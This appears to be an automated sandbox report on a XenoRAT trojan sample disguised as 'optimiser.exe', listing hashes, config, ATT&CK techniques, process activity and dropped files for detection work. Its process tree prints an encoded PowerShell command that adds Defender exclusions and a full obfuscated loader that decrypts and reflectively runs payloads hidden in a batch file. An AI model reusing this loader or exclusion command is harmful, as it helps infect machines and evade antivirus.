xenorat | a94a79df8c332ae5de59b99853ae97dc8a1fc272818a146bd7ad1d5e295611c5

Analysis

max time kernel
33s
max time network
39s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
12-06-2024 22:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

optimiser.exe
Size

431KB
MD5

74cb80305f51ff0585928c12be72dddd
SHA1

727a72de8f439beebf028f21d3cb58f45f99e42a
SHA256

a94a79df8c332ae5de59b99853ae97dc8a1fc272818a146bd7ad1d5e295611c5
SHA512

21775770e10ae19302d198d7c48799bc510aee0c7e92563798ba151760181facc6ba9452400cde84e3018881ec1a54ac82d1fd9b587c4bc2305af3b5793cf178
SSDEEP

12288:9uBadWfqCQi/szyz7FaFAf69ffou1R1L:9iadWfEssOzZusmPR

Score

10^/10

xenorat execution rat trojan

Malware Config

Extracted

Family

xenorat

127.0.0.1

Attributes

delay
5000
install_path
temp
port
7788
startup_name
lol

Signatures

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1768	powershell.exe
4692	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	optimiser.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	sdsd.exe

Executes dropped EXE 2 IoCs

pid	Process
992	sdsd.exe
4412	sdsd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 44 IoCs

pid	Process
1768	powershell.exe
4692	powershell.exe
4692	powershell.exe
1768	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	4692	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 948 wrote to memory of 1768	948	optimiser.exe	91
PID 948 wrote to memory of 1768	948	optimiser.exe	91
PID 948 wrote to memory of 1768	948	optimiser.exe	91
PID 948 wrote to memory of 628	948	optimiser.exe	93
PID 948 wrote to memory of 628	948	optimiser.exe	93
PID 948 wrote to memory of 628	948	optimiser.exe	93
PID 948 wrote to memory of 2000	948	optimiser.exe	95
PID 948 wrote to memory of 2000	948	optimiser.exe	95
PID 948 wrote to memory of 2000	948	optimiser.exe	95
PID 628 wrote to memory of 228	628	cmd.exe	97
PID 628 wrote to memory of 228	628	cmd.exe	97
PID 628 wrote to memory of 228	628	cmd.exe	97
PID 628 wrote to memory of 4420	628	cmd.exe	98
PID 628 wrote to memory of 4420	628	cmd.exe	98
PID 628 wrote to memory of 4420	628	cmd.exe	98
PID 4420 wrote to memory of 4348	4420	cmd.exe	99
PID 4420 wrote to memory of 4348	4420	cmd.exe	99
PID 4420 wrote to memory of 4348	4420	cmd.exe	99
PID 2000 wrote to memory of 1388	2000	cmd.exe	100
PID 2000 wrote to memory of 1388	2000	cmd.exe	100
PID 2000 wrote to memory of 1388	2000	cmd.exe	100
PID 2000 wrote to memory of 4692	2000	cmd.exe	101
PID 2000 wrote to memory of 4692	2000	cmd.exe	101
PID 2000 wrote to memory of 4692	2000	cmd.exe	101
PID 4692 wrote to memory of 3428	4692	powershell.exe	56
PID 4692 wrote to memory of 2164	4692	powershell.exe	39
PID 4692 wrote to memory of 1148	4692	powershell.exe	20
PID 4692 wrote to memory of 1372	4692	powershell.exe	24
PID 4692 wrote to memory of 776	4692	powershell.exe	8
PID 4692 wrote to memory of 2148	4692	powershell.exe	38
PID 4692 wrote to memory of 4904	4692	powershell.exe	104
PID 4692 wrote to memory of 2724	4692	powershell.exe	50
PID 4692 wrote to memory of 2520	4692	powershell.exe	43
PID 4692 wrote to memory of 1140	4692	powershell.exe	19
PID 4692 wrote to memory of 1332	4692	powershell.exe	23
PID 4692 wrote to memory of 1724	4692	powershell.exe	30
PID 4692 wrote to memory of 2704	4692	powershell.exe	49
PID 4692 wrote to memory of 1124	4692	powershell.exe	18
PID 4692 wrote to memory of 2388	4692	powershell.exe	42
PID 4692 wrote to memory of 1116	4692	powershell.exe	17
PID 4692 wrote to memory of 2688	4692	powershell.exe	48
PID 4692 wrote to memory of 1308	4692	powershell.exe	22
PID 4692 wrote to memory of 912	4692	powershell.exe	70
PID 4692 wrote to memory of 1696	4692	powershell.exe	29
PID 4692 wrote to memory of 1892	4692	powershell.exe	34
PID 4692 wrote to memory of 4984	4692	powershell.exe	67
PID 4692 wrote to memory of 3464	4692	powershell.exe	77
PID 4692 wrote to memory of 3660	4692	powershell.exe	65
PID 4692 wrote to memory of 3168	4692	powershell.exe	66
PID 4692 wrote to memory of 896	4692	powershell.exe	11
PID 4692 wrote to memory of 1880	4692	powershell.exe	33
PID 4692 wrote to memory of 1676	4692	powershell.exe	83
PID 4692 wrote to memory of 1652	4692	powershell.exe	28
PID 4692 wrote to memory of 2240	4692	powershell.exe	40
PID 4692 wrote to memory of 2628	4692	powershell.exe	46
PID 4692 wrote to memory of 1044	4692	powershell.exe	16
PID 4692 wrote to memory of 4920	4692	powershell.exe	71
PID 4692 wrote to memory of 1828	4692	powershell.exe	32
PID 4692 wrote to memory of 2812	4692	powershell.exe	52
PID 4692 wrote to memory of 1036	4692	powershell.exe	15
PID 4692 wrote to memory of 2024	4692	powershell.exe	36
PID 4692 wrote to memory of 3592	4692	powershell.exe	57
PID 4692 wrote to memory of 1224	4692	powershell.exe	21
PID 4692 wrote to memory of 2008	4692	powershell.exe	35

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
PID:776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1116

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2164

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3180

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3428
- C:\Users\Admin\AppData\Local\Temp\optimiser.exe
  "C:\Users\Admin\AppData\Local\Temp\optimiser.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:948
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZQBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAawBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAaAB1ACMAPgA="
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:628
  - - C:\Windows\SysWOW64\mode.com
      mode 800
      4⤵
      PID:228
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4420
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat"
        5⤵
        
        PID:4348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sdsd.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2000
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uE03OF756EwHDsXZZ4dW1daMDjFkoEm1g+uRel3+taQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OQwUXKYXuHYJURyKYIwNjA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $okmXp=New-Object System.IO.MemoryStream(,$param_var); $xIYUl=New-Object System.IO.MemoryStream; $muRJA=New-Object System.IO.Compression.GZipStream($okmXp, [IO.Compression.CompressionMode]::Decompress); $muRJA.CopyTo($xIYUl); $muRJA.Dispose(); $okmXp.Dispose(); $xIYUl.Dispose(); $xIYUl.ToArray();}function execute_function($param_var,$param2_var){ $BISrT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DWUga=$BISrT.EntryPoint; $DWUga.Invoke($null, $param2_var);}$kcqDb = 'C:\Users\Admin\AppData\Local\Temp\sdsd.bat';$host.UI.RawUI.WindowTitle = $kcqDb;$qjwUw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kcqDb).Split([Environment]::NewLine);foreach ($BKyFZ in $qjwUw) { if ($BKyFZ.StartsWith('mfixKLpOscLidzGbRQVv')) { $QJzdJ=$BKyFZ.Substring(20); break; }}$payloads_var=[string[]]$QJzdJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      4⤵
      PID:1388
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4692
    - - C:\Users\Admin\AppData\Local\Temp\sdsd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sdsd.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:992
      - C:\Users\Admin\AppData\Local\Temp\XenoManager\sdsd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XenoManager\sdsd.exe"
        6⤵
        Executes dropped EXE
        
        PID:4412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
PID:3168

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:3464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sdsd.exe.log

Filesize
226B

MD5
916851e072fbabc4796d8916c5131092

SHA1
d48a602229a690c512d5fdaf4c8d77547a88e7a2

SHA256
7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d

SHA512
07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

Download Submit
C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat

Filesize
27KB

MD5
d717847f40deba47954806864cbb41e6

SHA1
870ce3a8ccbf6c8ea6b1188592319f57e9fadc52

SHA256
4a389d61282947a697f5a2629c64248059eca904b266f08a64f76341c3967f8d

SHA512
91e1156c3bb9fb33f037cd7db01a64e92778561cb6ceec35a2eeac379d2d945e6636138a054503776803590429688f77d8219589a12c598c84625e18c21b33f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lc02l5nk.52a.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\sdsd.bat

Filesize
399KB

MD5
dedc70c320233bc67ceb02a9492f29d6

SHA1
d031a05a302501a50581a2338762013f60da62df

SHA256
c1836c0d56c8ec60cee58783c67c900f170d854e60f856c1a5b9e001894c8e1a

SHA512
776e753db2a34143981814c44fb0e8bdfa78b38d186ce9e794cd927f28408397460f302d63d731f4c6794cd745164211370b9db7b47b4884d01c5f76f066f93e

Download Submit
C:\Users\Admin\AppData\Local\Temp\sdsd.exe

Filesize
45KB

MD5
41146957ad1a37a26565c42ac174609a

SHA1
622b3cd22edd11ba59ec438e14fe96d0c03d5026

SHA256
320b867ae9cbb01c732fab179a66d1c63ea3498f6dae49e4d1cfcb5d5e0cb1fc

SHA512
d763fd0086ec0e6fbd0b2d73ed86ff6e08079fc3651e83e91c0ab198189d313db2b2ace8d72c55178d463647eeb8cafa1a511cbf2bc366959f3fea9be0b9079d

Download Submit
memory/992-75-0x0000000000940000-0x0000000000952000-memory.dmp

Filesize
72KB

Download
memory/1768-39-0x00000000069B0000-0x00000000069E2000-memory.dmp

Filesize
200KB

Download
memory/1768-63-0x00000000079F0000-0x0000000007A04000-memory.dmp

Filesize
80KB

Download
memory/1768-15-0x0000000005E00000-0x0000000005E66000-memory.dmp

Filesize
408KB

Download
memory/1768-13-0x0000000005420000-0x0000000005442000-memory.dmp

Filesize
136KB

Download
memory/1768-9-0x0000000002DF0000-0x0000000002E26000-memory.dmp

Filesize
216KB

Download
memory/1768-35-0x00000000063F0000-0x000000000640E000-memory.dmp

Filesize
120KB

Download
memory/1768-36-0x00000000067E0000-0x000000000682C000-memory.dmp

Filesize
304KB

Download
memory/1768-92-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/1768-10-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/1768-40-0x0000000074890000-0x00000000748DC000-memory.dmp

Filesize
304KB

Download
memory/1768-50-0x0000000006990000-0x00000000069AE000-memory.dmp

Filesize
120KB

Download
memory/1768-6-0x0000000074CAE000-0x0000000074CAF000-memory.dmp

Filesize
4KB

Download
memory/1768-51-0x0000000006A10000-0x0000000006AB3000-memory.dmp

Filesize
652KB

Download
memory/1768-77-0x0000000007A20000-0x0000000007A28000-memory.dmp

Filesize
32KB

Download
memory/1768-74-0x0000000007AD0000-0x0000000007AEA000-memory.dmp

Filesize
104KB

Download
memory/1768-54-0x0000000007790000-0x000000000779A000-memory.dmp

Filesize
40KB

Download
memory/1768-55-0x0000000007A30000-0x0000000007AC6000-memory.dmp

Filesize
600KB

Download
memory/1768-56-0x00000000079A0000-0x00000000079B1000-memory.dmp

Filesize
68KB

Download
memory/1768-12-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/1768-11-0x0000000005530000-0x0000000005B58000-memory.dmp

Filesize
6.2MB

Download
memory/1768-14-0x0000000005D90000-0x0000000005DF6000-memory.dmp

Filesize
408KB

Download
memory/1768-62-0x00000000079E0000-0x00000000079EE000-memory.dmp

Filesize
56KB

Download
memory/4692-61-0x0000000002A80000-0x0000000002A92000-memory.dmp

Filesize
72KB

Download
memory/4692-58-0x00000000076C0000-0x0000000007714000-memory.dmp

Filesize
336KB

Download
memory/4692-57-0x0000000002A70000-0x0000000002A78000-memory.dmp

Filesize
32KB

Download
memory/4692-53-0x0000000007410000-0x000000000742A000-memory.dmp

Filesize
104KB

Download
memory/4692-52-0x0000000007B30000-0x00000000081AA000-memory.dmp

Filesize
6.5MB

Download
memory/4692-38-0x0000000007430000-0x00000000074A6000-memory.dmp

Filesize
472KB

Download
memory/4692-37-0x0000000007280000-0x00000000072C4000-memory.dmp

Filesize
272KB

Download
memory/4692-34-0x0000000005BE0000-0x0000000005F34000-memory.dmp

Filesize
3.3MB

Download